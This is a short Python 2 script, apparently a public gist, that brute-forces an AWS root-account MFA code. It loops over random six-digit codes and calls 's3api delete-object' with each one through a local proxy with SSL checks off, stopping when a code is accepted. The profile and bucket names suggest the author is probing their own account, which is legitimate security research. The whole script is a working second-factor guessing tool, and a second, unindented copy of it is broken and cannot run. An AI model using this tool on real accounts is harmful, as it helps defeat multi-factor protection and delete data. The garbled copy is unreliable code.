andresriancho/bruteforce-2fa.py

## bruteforce-2fa.py
import os
import sys
import time
import random
import subprocess

FNULL = open(os.devnull, 'w')

env = {'HTTPS_PROXY': 'http://localhost:8080/'}
cmd = ('aws --region us-east-1 --no-verify-ssl --profile=andres-root s3api delete-object'
	   '    --mfa "arn:aws:iam::334918212912:mfa/root-account-mfa-device %s"'
	   '    --bucket bruteforce2fa --key kitten.gif')

TESTED_CODES = []


def get_random_code():
	code = random.randint(1, 999999)
	code = str(code)
	code = code.zfill(6)
	return code


def get_code():
	try:
		code = file('valid.code').read()
	except:
		code = get_random_code()
	else:
		code = code.strip()

		#if code and code not in TESTED_CODES:
		if code:
			TESTED_CODES.append(code)
			print('Using valid code %s from file' % code)
		else:
			code = get_random_code()

	return code


for i in xrange(100):
	code = get_code()
	current_cmd = cmd % code

	try:
		process = subprocess.Popen(current_cmd,
								   shell=True,
								   env=env,
								   stdout=FNULL,
								   stderr=subprocess.STDOUT)
		process.wait()
	except Exception, e:
		print('Exception raised while trying code %s: "%s"' % (code, e))
	else:
		if process.returncode == 0:
			print('Code %s is valid (return code: %s)' % (code, process.returncode))
			sys.exit(0)
		else:
			print('Code %s is invalid (return code: %s)' % (code, process.returncode))

sys.exit(1)
	import os
	import sys
	import time
	import random
	import subprocess

	FNULL = open(os.devnull, 'w')

	env = {'HTTPS_PROXY': 'http://localhost:8080/'}
	cmd = ('aws --region us-east-1 --no-verify-ssl --profile=andres-root s3api delete-object'
	' --mfa "arn:aws:iam::334918212912:mfa/root-account-mfa-device %s"'
	' --bucket bruteforce2fa --key kitten.gif')

	TESTED_CODES = []


	def get_random_code():
	code = random.randint(1, 999999)
	code = str(code)
	code = code.zfill(6)
	return code


	def get_code():
	try:
	code = file('valid.code').read()
	except:
	code = get_random_code()
	else:
	code = code.strip()

	#if code and code not in TESTED_CODES:
	if code:
	TESTED_CODES.append(code)
	print('Using valid code %s from file' % code)
	else:
	code = get_random_code()

	return code



	for i in xrange(100):
	code = get_code()
	current_cmd = cmd % code

	try:
	process = subprocess.Popen(current_cmd,
	shell=True,
	env=env,
	stdout=FNULL,
	stderr=subprocess.STDOUT)
	process.wait()
	except Exception, e:
	print('Exception raised while trying code %s: "%s"' % (code, e))
	else:
	if process.returncode == 0:
	print('Code %s is valid (return code: %s)' % (code, process.returncode))
	sys.exit(0)
	else:
	print('Code %s is invalid (return code: %s)' % (code, process.returncode))

	sys.exit(1)